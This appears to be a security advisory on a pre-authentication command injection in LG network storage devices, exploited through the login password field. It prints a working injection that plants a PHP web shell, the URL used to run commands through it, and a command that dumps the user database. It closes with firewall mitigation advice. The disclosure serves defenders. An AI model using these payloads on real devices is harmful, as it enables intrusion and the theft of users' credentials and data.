RCE in LG Network Storage Devices

A flaw has been discovered in LG Network attached Storage Devices that allow attackers to execute remote code and steal data from the device without authentication.

A pre-authenticated remote command injection vulnerability exists, which can allow attacker to perform virtually full computer functioning to include access to sensitive data and tamper with the user data and content.  Attackers can then upload and distribute malware across the network using this storage device.

The LG Network Attached Storage (NAS) device is a dedicated file storage unit, connected to a network, that allows users to store and share data with multiple computers.  Authorized users can access their data remotely both within the network and over the Internet.[1]

The command injection vulnerability resides due to improper input validation of a “password” parameter on the login page.  This allows remote attackers to remotely pass commands through the password field.

First we write a PHP shell by entering this command in the password field

; echo “<?php echo \”<pre>\”; system(\$_GET[‘p’]); echo \”</pre>\”;?>” >/tmp/x2;sudo mv /tmp/x2/var/www/payload.php

 

We can now pass the commands and execute them using:

http://ip_address:8000/payload.php?p=command_to_execute

 

We can now use various payload e.g.

Payload to read user database

echo “.dump user” | sqlite3 /etc/nas/db/share.db

Once initiated, attackers can run all the commands.  Using this shell, attackers can execute more commands easily, one of which highly likely allow them to download the complete database of NAS devices, including users’ emails, usernames and MD5 hashed passwords.  Since passwords protected with MD5 cryptographic hash function can easily be cracked, attackers can gain authorized access and steal a user’s sensitive data stored on the vulnerable devices.

An exploitation video has also been created. It can be viewed at: https://www.youtube.com/watch?v=7RgCq5d13qk

Prevention and Mitigation Strategies

Since LG has not yet released a fix for the issue, our members are advised to ensure that their devices are not accessible via the public Internet and should be protected behind a firewall configured to allow only a trusted set of IPs to connect to the web interface. Wapack Labs and members alike should keep vigilant for firmware upgrades and patches.

 

[1] http://www.lg.com/uk/network-storage/lg-N2B1D-network-attached-storage

E-mail me when people leave their comments –

You need to be a member of Red Sky Alliance to add comments!